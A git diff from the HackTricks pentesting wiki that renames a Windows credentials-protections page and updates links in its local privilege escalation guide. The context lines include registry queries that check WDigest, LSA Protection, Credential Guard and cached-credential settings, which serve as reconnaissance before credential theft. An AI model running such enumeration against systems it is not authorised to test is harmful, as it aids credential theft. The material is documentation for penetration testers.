-🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 +🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
diff --git a/windows-hardening/stealing-windows-credentials/windows-credentials-protections.md b/windows-hardening/stealing-credentials/credentials-protections.md similarity index 99% rename from windows-hardening/stealing-windows-credentials/windows-credentials-protections.md rename to windows-hardening/stealing-credentials/credentials-protections.md index a830d9216..fc147d804 100644 --- a/windows-hardening/stealing-windows-credentials/windows-credentials-protections.md +++ b/windows-hardening/stealing-credentials/credentials-protections.md @@ -1,4 +1,4 @@ -# Credentials Protections +# Windows Credentials Protections ## Credentials Protections diff --git a/windows-hardening/windows-local-privilege-escalation/README.md b/windows-hardening/windows-local-privilege-escalation/README.md index 78607f12f..011c3aca7 100644 --- a/windows-hardening/windows-local-privilege-escalation/README.md +++ b/windows-hardening/windows-local-privilege-escalation/README.md @@ -322,7 +322,7 @@ reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\Subs ### WDigest If active, **plain-text passwords are stored in LSASS** (Local Security Authority Subsystem Service).\ -[**More info about WDigest in this page**](../stealing-windows-credentials/windows-credentials-protections.md#wdigest). +[**More info about WDigest in this page**](../stealing-credentials/credentials-protections.md#wdigest). ``` reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential @@ -331,7 +331,7 @@ reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v Use ### LSA Protection Microsoft in **Windows 8.1 and later** has provided additional protection for the LSA to **prevent** untrusted processes from being able to **read its memory** or to inject code.\ -[**More info about LSA Protection here**](../stealing-windows-credentials/windows-credentials-protections.md#lsa-protection). +[**More info about LSA Protection here**](../stealing-credentials/credentials-protections.md#lsa-protection). ``` reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL @@ -340,7 +340,7 @@ reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL ### Credentials Guard **Credential Guard** is a new feature in Windows 10 (Enterprise and Education edition) that helps to protect your credentials on a machine from threats such as pass the hash.\ -[**More info about Credentials Guard here.**](../stealing-windows-credentials/windows-credentials-protections.md#credential-guard) +[**More info about Credentials Guard here.**](../stealing-credentials/credentials-protections.md#credential-guard) ``` reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags @@ -349,7 +349,7 @@ reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags ### Cached Credentials **Domain credentials** are used by operating system components and are **authenticated** by the **Local** **Security Authority** (LSA). Typically, domain credentials are established for a user when a registered security package authenticates the user's logon data.\ -[**More info about Cached Credentials here**](../stealing-windows-credentials/windows-credentials-protections.md#cached-credentials). +[**More info about Cached Credentials here**](../stealing-credentials/credentials-protections.md#cached-credentials). ``` reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT @@ -775,9 +775,9 @@ Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L ### Firewall Rules -[**Check this page for Firewall related commands**](../basic-win-cmd-for-pentesters.md#firewall) **(list rules, create rules, turn off, turn off...)** +[**Check this page for Firewall related commands**](../basic-cmd-for-pentesters.md#firewall) **(list rules, create rules, turn off, turn off...)** -More[ commands for network enumeration here](../basic-win-cmd-for-pentesters.md#network) +More[ commands for network enumeration here](../basic-cmd-for-pentesters.md#network) ### Windows Subsystem for Linux (wsl)